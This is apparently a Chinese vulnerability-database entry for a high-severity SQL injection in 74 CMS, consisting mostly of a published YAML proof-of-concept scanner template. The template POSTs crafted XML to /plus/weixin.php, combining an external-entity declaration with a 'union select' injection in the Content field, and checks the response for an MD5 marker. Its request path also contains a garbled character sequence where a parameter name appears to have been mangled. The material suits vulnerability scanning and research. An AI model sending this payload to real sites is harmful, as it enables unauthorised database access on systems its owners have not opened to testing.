74cms-sqli-1: 74 CMS SQL 注入漏洞

日期: 2025-09-01 | 影响软件: 74 cms | POC: 已公开

漏洞描述

74cms-sqli-1 app="骑士-74CMS"

PoC代码[已公开]

id: 74cms-sqli-1

info:
  name: 74 CMS SQL 注入漏洞
  author: betta
  severity: high
  verified: true
  description: 74cms-sqli-1 app="骑士-74CMS"
  reference:
    - https://www.uedbox.com/post/29340

set:
    rand: randomInt(200000000, 210000000)
rules:
    r0:
        request:
            method: POST
            path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
            headers:
                Content-Type: text/xml
            body: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{rand}})#</Content></xml>
            follow_redirects: false
        expression: response.body.bcontains(bytes(md5(string(rand))))
expression: r0()

相关漏洞推荐